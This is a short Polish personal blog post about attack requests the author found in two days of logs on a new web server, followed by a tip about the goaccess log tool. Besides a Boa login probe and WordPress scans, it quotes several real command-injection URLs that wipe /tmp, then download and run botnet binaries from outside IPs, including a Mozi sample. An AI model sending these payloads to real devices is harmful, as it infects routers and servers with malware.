Uroki posiadania serwera WWW

Najłatwiej dowiedzieć się tym co jest na topie jeśli chodzi o ataki na serwery http, gdy postawi się własny.

Na moim blogu nic jeszcze nie ma, nie próbowałem go w żaden sposób promować (bo po co puste strony promować), a wystarczy przeanalizować logi z dwóch dni, żeby poznać całkiem ciekawe urle.

Na przykład najpopularniejszy request, to

/boaform/admin/formLogin

Nie mam nawet pojęcia czym jest ten boa (8,43% requestów).

Kolejny fajny:

/shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws

/shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws

Nie wiem co to robi, ale przynajmniej wiem skąd to pobrać – i są dwa serwery, gdyby jeden się zepsuł.

A potem seria GET-ów do wp-login.php pod różnymi ścieżkami. Zgaduję, że to wordpress.

I jeszcze jeden z tych ciekawszych:

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

Tutaj adres jest dość ciekawy. 192.168.0.0/16 to lokalna, nieroutowana pula adresów. Nie mam pojęcia, czy to przypadkowy request, czy też coś fajnego można znaleźć na routerach netgear.

Przy okazji, całkiem fajnym konsolowym narzędziem do analizy logów jest goaccess.io.

Proste i nawet ładnie wygląda.

goaccess w działaniu

#goaccess #http #www #logs

Kontakt ze mną: @ark_r@mastodon.social